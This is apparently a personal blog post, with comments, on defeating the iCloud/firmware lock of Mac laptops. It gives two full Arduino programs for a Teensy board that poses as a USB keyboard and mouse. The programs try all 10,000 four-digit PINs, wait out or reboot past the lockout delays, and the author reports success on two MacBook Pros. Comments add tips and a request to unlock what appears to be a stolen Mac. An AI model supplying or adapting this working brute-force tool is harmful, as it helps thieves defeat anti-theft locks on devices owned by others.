hack a mac (again)

“No security is better than lame security” – Ray Biez circa 1998

Apple, for all their self-congratulatory PR that fills mainstream media, is privately (in)famous for, well, piss-poor security. It’s harder to remove the OS password from a Windows PC – even one running XP – than it is to do the same on even the latest Mac/MacBook. Ok, it’s not exactly rocket science to remove the user security from either, but you do need more than just your fingers to bust the Windows security.

iCloud is Apple’s offering to secure users’ hardware in case of loss/theft, a multi-faceted product that covers hardware running both Apple operating systems – OSX and iOS. Although it’s a highly vaunted product, they’ve taken a long time to perfect the iOS version – prior to iOS 7.1.1 it’s not too hard to break that thing off. (Using only your fingers.)

And the OSX version, oh boy.
[image: pin-lock]
That’s like a combination lock there, takes 4 digits to unlock it. So let me work this out – 0000 is the lowest possible code, while 9999 is the highest. And if it’s not either of those two, then somewhere in between is your answer. A rather trivial total of just 10,000 possible combinations. Given enough time & patience, this can even be done manually – eventually you’ll type the correct sequence.

Fuck that, manually typing 100 combinations would piss me off. I know, let’s use science & technology! The micro-controller industry has given us a bunch of tiny component-style silicon boards, capable of just a specific task or two. Teensy 3.1 is an Arduino-like board that can be programmed to emulate a USB keyboard & mouse. Here’s the one I received today:
Plug it in via micro-USB – see the glowing light, it lives!

So, hunt down a Teensy 3.1 via your local Googles. Mine was delivered overnight for NZ$41 incl postage. Download and install the Arduino IDE & the Teensyduino add-on, which includes the two required libraries – usb_keyboard.h & usb_mouse.h. Copy these two files to a project folder, to where you’ll add the magic code before compiling. The SDK is available in OSX, Windows & Linux variants.

Next you need to either write the code from scratch or source ready-made code that’ll do the consecutive number entry we require (with some additional variation in the routine to work around Apple’s minor time lock on repeated entries).

You’ll find two proven choices, Orvtech and Knoy. I’ve used both; right now – at this very minute in fact – Knoy’s version for the 15″ MacBook Pro is chugging away next to me. I’m not so sure about the Knoy codebase, but since it’s a 5-minute procedure to reprogram the Teensy, the Orvtech code can run on the MacBook Pro if there’s no result from the Knoy compile. The Knoy code runs quicker as it invokes restarts more often than the Orvtech solution. Having said that, Orvtech worked for me last time.

UPDATE: I don’t know why but the Knoy Arduino solution failed. I gave it two machines to play with, parked them in a cupboard & left them alone for 2-3 days each. Both times I returned to find a dark screen, pre-booting the lock screen with the Teensy 3 flashing fast & bright.

So I’ve re-coded with an enhanced version of the Orvtech script:

```cpp
#include <usb_keyboard.h>

const int ledPin = 13;
int counter = 0;          // current 4-digit guess, 0000..9999
int loops = 0;            // entries typed since the last lockout cycle reset
int fakecounter = counter;
char pin[5] = "xxxx";     // 4 digits plus NUL terminator

void setup() {
  pinMode(ledPin, OUTPUT);
  delay(30000);           // wait 30 s for the iCloud lock screen to come up
}

void loop() {
  keyboard_modifier_keys = 0;
  // Apple's escalating lockout: sit it out before the 6th, 7th and 8th entries
  if (loops == 5) {
    delay(63000);         // 1 minute and 1 second
  } else if (loops == 6) {
    delay(301000);        // 5 minutes and 1 second
  } else if (loops == 7) {
    delay(901000);        // 15 minutes and 1 second
    loops = 0;
  }
  // type the next guess
  if (counter <= 9999) {
    delay(1500);
    digitalWrite(ledPin, LOW);
    delay(800);
    digitalWrite(ledPin, HIGH);
    sprintf(pin, "%04d", fakecounter);   // zero-padded, e.g. 0042
    Keyboard.press(pin[0]);              // first digit
    delay(450);
    Keyboard.release(pin[0]);
    delay(420);
    Keyboard.press(pin[1]);              // second digit
    delay(398);
    Keyboard.release(pin[1]);
    delay(510);
    Keyboard.press(pin[2]);              // third digit
    delay(421);
    Keyboard.release(pin[2]);
    delay(423);
    Keyboard.press(pin[3]);              // fourth digit
    delay(430);
    Keyboard.release(pin[3]);
    delay(525);
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
  // reached 4-digit PIN max value: blink and idle
  if (counter > 9999) {
    for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
    }
    delay(6000);
  }
  ++counter;
  ++loops;
  fakecounter = counter;
}
```

Running this code against the iCloud block (iCloud lock is an overstatement) is a simple process. Plug yer Teensy in, boot the Mac, kick back & wait. It takes about 17 seconds per entry, averaged, including restarts to circumvent the multiple-entry hurdle. Time ’til breakthrough is dependent upon where in the range the code is, but expect the tell-tale “dong” success tone within 72 hours. But hey, if the iCloud code was set at a low number, say 0XXX, then hang around for an hour or so cos your answer is on its way.

[image: iCloud cracker in action]

The practicalities of this code are not extensive. It’s more an application in slow, methodical cracking than any brilliant invocation of a hi-tech algorithm. There is no salted hash to track down and crack, it’s just a simple exercise in orderly, automated data entry (that a patient human can also do. Or a monkey, a well-trained monkey.)

There aren’t, seemingly, that many Mac computers utilising iCloud protection. I think it’s a far better idea to keep your Apple product out of harm’s way, locked down & tucked away safely. That, and insured. Keep your Mac backed up (data insurance) and commercially insured.

UPDATE: I got sick of wait, wait, waiting for the Orvtech solution to show me the money. I can’t do unoptimised code, I just can’t. Digital is a direct thing, the shortest way between two points. So why sit round waiting for 15 mins when a restart takes less than 2 mins?

While I was waiting for the inefficient code to bumble its way through, I took a fresh look at the Knoy compile – his code is offered for 15″ or 13″ MacBooks – made some minor adjustments of my own, then rebuilt the Teensy & set it loose on a 2011 15″ MacBook Pro again.

```cpp
#include <usb_keyboard.h>
#include <usb_mouse.h>

const int ledpin = 13;
int waitcounter = 0;        // entries since the last lockout reset
int guesscounter = 0;       // Set your starting point here
char guess[5] = "0000";     // 4 digits plus NUL terminator

// Drag the pointer to the bottom-left corner so later moves start from a known spot
void resetMouse() { for (int i = 0; i < 6; i++) { Mouse.move(-127, 127); delay(200); } }
void moveMouse(int x, int y) { Mouse.move(x, y); delay(200); }
void pressKeyboard(int key) { Keyboard.press(key); delay(200); Keyboard.release(key); delay(500); }

void setup() {
  pinMode(ledpin, OUTPUT);
  keyboard_modifier_keys = 0;
  delay(5000);            // Wait for 5s before starting
  resetMouse();
  moveMouse(127, -127);   // Move mouse over wifi popup and close it
  moveMouse(127, -127);
  moveMouse(127, 0);
  Mouse.click(MOUSE_LEFT);
  delay(500);
  pressKeyboard(KEY_ESC);
  delay(500);
  Mouse.click(MOUSE_LEFT);
  delay(200);
}

void loop() {
  if (waitcounter == 5) delay(65000);   // Hit 1 minute lockout, wait until we get another chance
  else if (waitcounter == 6) {          // Hit 5 minute lockout, let's reboot instead of waiting - I like this!
    digitalWrite(ledpin, HIGH);
    delay(20000);         // Wait 20s before restarting in case we hit the right PIN
    resetMouse();         // Move mouse over the restart button
    moveMouse(127, -45);
    moveMouse(127, 0);
    moveMouse(127, 0);
    Mouse.click(MOUSE_LEFT);   // Click restart & wait for it to reboot
    delay(95000);
    resetMouse();
    moveMouse(127, -45);  // Move mouse over wifi popup and close it
    moveMouse(127, -127);
    moveMouse(127, 0);
    Mouse.click(MOUSE_LEFT);
    delay(500);
    pressKeyboard(KEY_ESC);
    delay(500);
    Mouse.click(MOUSE_LEFT);
    digitalWrite(ledpin, LOW);
    waitcounter = -1;     // the increment below brings this back to 0
  }
  waitcounter++;

  if (guesscounter <= 9999) {
    delay(1000);          // Wait 1 second between entries
    digitalWrite(ledpin, HIGH);
    snprintf(guess, sizeof guess, "%04d", guesscounter);   // zero-padded into the 5-byte buffer
    pressKeyboard(guess[0]);
    pressKeyboard(guess[1]);
    pressKeyboard(guess[2]);
    pressKeyboard(guess[3]);
    pressKeyboard(KEY_RETURN);
    digitalWrite(ledpin, LOW);
  } else {                // Flash LED continuously when we're done
    while (true) {
      digitalWrite(ledpin, HIGH);
      delay(100);
      digitalWrite(ledpin, LOW);
      delay(100);
    }
  }
  guesscounter++;
}
```

Three days in, somewhere past the 5000 mark the reboot chime halted – cracked it! To make sure it wasn’t a fluke, I immediately put a second MacBook Pro, same spec, up against the Teensy. Around 18 hours later, Ka-ching! Cracked it!

PS: Do not even think that your bright idea of reformatting the hard drive on an iCloud locked Mac will solve the puzzle far quicker than the system described above. It won’t. What it will do is increase the EFI lock code from 4 digits to 6, taking the cracking process from 3 days to around 7.5 months. Your best advice, if you are less than fully aware of Apple security, is to Step Away From The Keyboard – pay somebody who knows what they’re up to.

6 thoughts on “hack a mac (again)”

  1. As someone might lock your computer on purpose (such as mine), he/it probably wants the PIN most difficult to guess. So personally I think it would be better to randomly shuffle the whole array [0000 to 9999] then try, because it’s highly possible he won’t set a PIN like 0801 or 9014, etc.

  2. Hi,
    It was an interesting article. I have an iCloud locked MacBook Pro I bought for just $300. It is asking for a 6 digit unlock code. Can you help me to re-programme it for 6 digits? I am not a
    computer programmer.

    thank you

    1. I’m tempted to do what the MacBook Pro vendor did to you – sell you a useless item at a ridiculous price. If you’re that dumb, I figure you’d happily pay another $300 for an Arduino unlocker. (Which would work, but could take 6 months or more)

      Why did you spend on an iCloud-locked MacBook Pro, especially when you’ve no knowledge of how to unlock? That would rank alongside the chocolate teapot as #1 most useless item ever purchased.

      Is there anything else you’d like to buy? Cassette tape player? AGP Video card? Or should I get you to send your (it’s not really yours) MBPro to me? I promise to send it straight back!

      (Peeps, this is fixable. Easily. Not by the USB solution though. Some knowledge is not for all people.)
